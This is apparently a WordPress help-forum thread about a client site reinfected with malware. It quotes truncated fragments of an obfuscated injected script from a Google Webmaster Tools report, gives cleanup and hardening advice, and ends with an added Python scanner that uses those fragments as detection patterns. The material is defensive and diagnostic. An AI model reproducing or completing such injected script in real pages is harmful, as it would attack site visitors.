Malware on WordPress site

Twice now within one month Google Webmaster Tools has reported malware on my client’s site www.beverlyhaberman.com. The first time I completely removed and re-loaded all the files. This time I’d like to get to the root cause of the malware.

  1. What is the source of this infection?
  2. How can I prevent this from happening again?
  3. Is there some way I can get rid of the infection short of removing and re-installing the files again?

Here are the malware details according to Google Webmaster Tools.

Last checked: April 5, 2012

Suspected injected code at
URL: http://beverlyhaberman.com/

<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
)===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
......

Suspected injected code at
URL: http://beverlyhaberman.com/workplace-productivity/

<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
)===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
......

Suspected injected code at
URL: http://beverlyhaberman.com/workplace-productivity/the-energy-of-yes

<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
)===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
......

Could be any number of reasons, most of which have been discussed in depth here before (try a search for ‘hacked’, ‘virus’ or similar).

As to which one it is, this is a process of elimination. If you’re on shared hosting you’re less likely to get to the bottom of it, as you probably won’t have access to the logs necessary to examine what’s happened in detail.

Check out this WordPress article on SitePoint.

Plus check into your wordpress hosting company. Lots of hosting companies allow wordpress to be installed, but have you are responsible for …

Something is putting that line of code at the top of your pages - probably the index.php file(s). But more important - that “something” will keep putting the hack code back unless you do a complete clearing out as recommended in the referenced articles.

Instead of trying to locate the source of the recurrence, just wipe the site, re-install WordPress + plugins and harden the site as mentioned.

Cheers,
Let me know how it goes.

When you mean completely wipe out the site, do you mean the database as well, or just the files?

Don’t just wipe it - save a backup of your database or you’ll lose your posts and comments.

Then virus scan it. And if you can’t get new plugins and the theme you’re using, scan those too.

Scan your own machine, change passwords, install a fresh most recent version of WordPress etc. etc. The codex has a good page “Hardening WordPress” if I remember correctly.

Keep backup data always. The other thing is to remove this injected code from all PHP files. I guess the PHP files have this script injection. The main thing is a secure password. Change your passwords frequently and use strong ones.
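
Added example, not part of the original thread: a small Python scanner that walks a site directory and lists the files containing the fragments visible in the Google Webmaster Tools report above, ignoring whitespace so line wrapping does not hide a match. The extension list, function names and the two-file sample site are assumptions made for illustration.

```python
import os
import re
import tempfile

def squash(text):
    """Remove all whitespace so line wrapping or re-indenting cannot hide a marker."""
    return re.sub(r"\s+", "", text)

# Fragments visible in the Google Webmaster Tools report quoted in the thread.
MARKERS = [squash(m) for m in (
    'parseInt("0"+"123")===83',
    'new String("asd").prototype.q',
    'catch(egewgsd)',
)]
EXTENSIONS = (".php", ".js", ".html", ".htm")  # assumption: file types worth checking

def scan_tree(root):
    """Return {relative path: [markers found]} for every matching file under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    body = squash(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            found = [m for m in MARKERS if m in body]
            if found:
                hits[os.path.relpath(full, root)] = found
    return hits

def make_sample_tree():
    """Build a constructed two-file site: one injected index.php, one clean file."""
    root = tempfile.mkdtemp()
    injected = ('<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"\n'
                ')===83)try{new String("asd").prototype.q}catch(egewgsd){}</script>\n'
                "<?php /* constructed sample, payload omitted */ ?>\n")
    for name, text in (("index.php", injected), ("footer.php", "<?php echo 'ok'; ?>\n")):
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(text)
    return root

if __name__ == "__main__":
    for path, found in sorted(scan_tree(make_sample_tree()).items()):
        print(f"{path}: {len(found)} marker(s) matched")
```

A scan with no matches only shows that these literal fragments are absent from the files on disk; server-side code that emits the script at request time would not be found this way.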